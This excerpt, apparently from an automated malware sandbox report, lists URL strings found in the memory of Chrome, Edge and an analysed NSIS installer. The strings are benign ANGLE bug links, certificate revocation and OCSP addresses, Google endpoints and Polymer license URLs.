                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5371
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5375
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5421
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5430
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535
                Source: chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/553588
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1888594099.000036EC00748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
                Source: chrome.exe, 00000015.00000002.1888594099.000036EC00748000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658/
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1885705642.000036EC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1957582472.000033FC00390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5901
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1957582472.000033FC00390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887499248.000036EC004A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
                Source: chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651/
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887499248.000036EC004A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887499248.000036EC004A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1957582472.000033FC00390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887499248.000036EC004A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887499248.000036EC004A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887499248.000036EC004A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
                Source: din.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                Source: din.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                Source: din.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                Source: din.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                Source: din.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                Source: chrome.exe, 00000015.00000002.1887024010.000036EC00300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clients2.google.com/time/1/current
                Source: chrome.exe, 00000015.00000002.1888166681.000036EC00674000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
                Source: Prizes.0.dr, Centered.com.2.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                Source: Prizes.0.dr, Centered.com.2.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                Source: Prizes.0.dr, Centered.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: Prizes.0.dr, Centered.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                Source: Prizes.0.dr, Centered.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                Source: din.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                Source: din.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                Source: din.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                Source: din.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                Source: din.exeString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
                Source: din.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                Source: din.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                Source: din.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                Source: din.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: din.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                Source: din.exeString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
                Source: din.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                Source: din.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                Source: chrome.exe, 00000015.00000002.1885745351.000036EC0005B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                Source: msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
                Source: chrome.exe, 00000015.00000003.1810575976.000036EC010AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810894201.000036EC010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810519278.000036EC0109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810832476.000036EC00F4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
                Source: din.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: din.exeString found in binary or memory: http://ocsp.digicert.com0A
                Source: din.exeString found in binary or memory: http://ocsp.digicert.com0C
                Source: din.exeString found in binary or memory: http://ocsp.digicert.com0L
                Source: din.exeString found in binary or memory: http://ocsp.digicert.com0N
                Source: din.exeString found in binary or memory: http://ocsp.digicert.com0O
                Source: Prizes.0.dr, Centered.com.2.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                Source: Prizes.0.dr, Centered.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                Source: Prizes.0.dr, Centered.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                Source: Prizes.0.dr, Centered.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                Source: chrome.exe, 00000015.00000003.1810575976.000036EC010AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1891087879.000036EC00D98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813167152.000036EC0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1886957092.000036EC002F7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812347913.000036EC00A24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813304700.000036EC01224000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810894201.000036EC010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810519278.000036EC0109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810791157.000036EC010FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812330053.000036EC00CDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810832476.000036EC00F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812535851.000036EC00F94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812369339.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813243843.000036EC011A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
                Source: chrome.exe, 00000015.00000003.1810575976.000036EC010AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1891087879.000036EC00D98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813167152.000036EC0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1886957092.000036EC002F7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812347913.000036EC00A24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813304700.000036EC01224000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810894201.000036EC010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810519278.000036EC0109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810791157.000036EC010FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812330053.000036EC00CDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810832476.000036EC00F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812535851.000036EC00F94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812369339.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813243843.000036EC011A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
